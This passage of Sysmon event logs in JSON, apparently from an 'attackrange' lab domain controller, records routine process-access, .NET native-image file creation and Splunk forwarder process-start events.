Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.162","SourceProcessGUID":"{41C8662E-2294-5F25-0000-00100FB90F00}","SourceProcessId":"4168","SourceThreadId":"2928","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8001,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:44.475\r\nProcessGuid: {41C8662E-2293-5F25-0000-00105FB50F00}\r\nProcessId: 2912\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b60-0\\System.ServiceModel.Activation.dll\r\nCreationUtcTime: 2020-08-01 08:06:44.475","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:44.475","ProcessGuid":"{41C8662E-2293-5F25-0000-00105FB50F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b60-0\\System.ServiceModel.Activation.dll","CreationUtcTime":"2020-08-01 08:06:44.475","EventReceivedTime":"2020-08-01 08:06:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8002,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.522\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2294-5F25-0000-001027BF0F00}\r\nTargetProcessId: 3376\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.522","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2294-5F25-0000-001027BF0F00}","TargetProcessId":"3376","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8003,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.522\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2294-5F25-0000-001027BF0F00}\r\nTargetProcessId: 3376\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.522","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2294-5F25-0000-001027BF0F00}","TargetProcessId":"3376","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8004,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.522\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2294-5F25-0000-001027BF0F00}\r\nTargetProcessId: 3376\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.522","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2294-5F25-0000-001027BF0F00}","TargetProcessId":"3376","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8005,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.600\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2294-5F25-0000-00106DC30F00}\r\nTargetProcessId: 4500\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.600","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2294-5F25-0000-00106DC30F00}","TargetProcessId":"4500","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8006,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.600\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2294-5F25-0000-00106DC30F00}\r\nTargetProcessId: 4500\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.600","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2294-5F25-0000-00106DC30F00}","TargetProcessId":"4500","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8007,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.615\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2294-5F25-0000-00106DC30F00}\r\nTargetProcessId: 4500\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.615","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2294-5F25-0000-00106DC30F00}","TargetProcessId":"4500","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8008,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.710\r\nProcessGuid: {41C8662E-2294-5F25-0000-001058C90F00}\r\nProcessId: 4772\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:06:44.710","ProcessGuid":"{41C8662E-2294-5F25-0000-001058C90F00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:06:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8009,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:44.709\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2294-5F25-0000-001058C90F00}\r\nTargetProcessId: 4772\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program 